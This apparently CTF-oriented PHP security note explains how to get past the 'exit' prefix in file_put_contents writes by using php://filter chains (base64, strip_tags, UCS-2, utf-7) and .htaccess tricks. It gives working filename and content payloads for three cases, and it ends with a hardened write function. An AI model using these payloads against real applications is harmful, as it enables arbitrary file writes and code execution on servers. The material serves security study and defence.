There are currently three variants of the file_put_contents plus "death exit" combination:
file_put_contents($filename, "<?php exit();".$content);
file_put_contents($content, "<?php exit();".$content);
file_put_contents($filename, $content . "\n114514");
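The bypasses are all similar: a single filter or a filter chain is used to break up the unwanted code
string.strip_tags strips HTML, XML and PHP tags
convert.base64-encode/decode base64 encoding/decoding
string.rot13 rot13 rotation substitution of English letters
convert.iconv.UCS-2LE.UCS-2BE converts the current UCS-2 Little-Endian characters to UCS-2 Big-Endian, i.e. reverses every group of 2 characters
convert.iconv.UCS-4LE.UCS-4BE reverses every group of 4 characters
convert.iconv.utf-8.utf-7 converts utf-8 to utf-7, with no effect on digits and English letters
zlib.deflate/inflate zlib compression/decompression
.htaccess pre-inclusion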
Case 1
<?php
$filename = "";
$content = "";
file_put_contents($filename, "<?php exit();".$content);
?>
base64-decode:
$filename = "php://filter/convert.base64-decode/resource=phpinfo.php";
$content = "aPD9waHAgcGhwaW5mbygpOz8+";
strip_tags+base64-decode:
$filename = "php://filter/string.strip_tags|convert.base64-decode/resource=phpinfo.php";
$content = "?>PD9waHAgcGhwaW5mbygpOz8+";
Case 2
<?php
$content = "";
file_put_contents($content, "<?php exit();".$content);
?>
UCS-2LE.UCS-2BE:
$content = "php://filter/convert.iconv.UCS-2LE.UCS-2BE|?<hp phpipfn(o;)>?/resource=phpinfo.php";
utf-8.utf-7+base64-decode:
$content = "php://filter/write=PD9waHAgcGhwaW5mbygpOz8+|convert.iconv.utf-8.utf-7|convert.base64-decode/resource=phpinfo.php";
Case 3
<?php
$filename = "";
$content = "";
file_put_contents($filename, $content . "\n114514");
?>
If there are no restrictions at all, the PHP code can be written directly; the suffix does not affect command execution:
$filename = "phpinfo.php";
$content = "<?php phpinfo();?>";
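A hardened form of the write used in the three cases above, as an added example that is not part of the original page: it refuses stream wrappers in the target name and confines writes to one directory with an allow-listed extension. The names safe_target and safe_write, the directory /var/app/uploads and the txt/log allow-list are assumptions.

```php
<?php
// Added example (not from the original page). safe_target(), safe_write(),
// UPLOAD_DIR and the extension allow-list are hypothetical.

const UPLOAD_DIR  = '/var/app/uploads';
const ALLOWED_EXT = ['txt', 'log'];

function safe_target(string $name): ?string
{
    // A scheme separator means a stream wrapper such as php://filter,
    // which is what lets a filter chain rewrite the bytes being written.
    if (strpos($name, '://') !== false || strpos($name, "\0") !== false) {
        return null;
    }
    // Drop directory components so the write stays inside UPLOAD_DIR.
    $base = basename($name);
    if ($base === '' || $base[0] === '.') {   // also blocks .htaccess
        return null;
    }
    // Whole-name allow-list: no ':' '|' '/' and exactly one extension,
    // which must not be one the server executes.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([a-z]+)\z/', $base, $m)
        || !in_array($m[1], ALLOWED_EXT, true)) {
        return null;
    }
    return UPLOAD_DIR . '/' . $base;
}

function safe_write(string $name, string $content): bool
{
    $path = safe_target($name);
    if ($path === null) {
        return false;
    }
    return file_put_contents($path, $content, LOCK_EX) !== false;
}

// Constructed inputs: target names of the kind used in the cases above.
$samples = [
    'php://filter/convert.base64-decode/resource=phpinfo.php',
    'phpinfo.php',
    '.htaccess',
    'notes.txt',
];
foreach ($samples as $s) {
    printf("%-60s %s\n", $s, safe_target($s) ?? 'rejected');
}
```

Serving the upload directory with PHP execution disabled removes the impact even if a file does land there.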
References: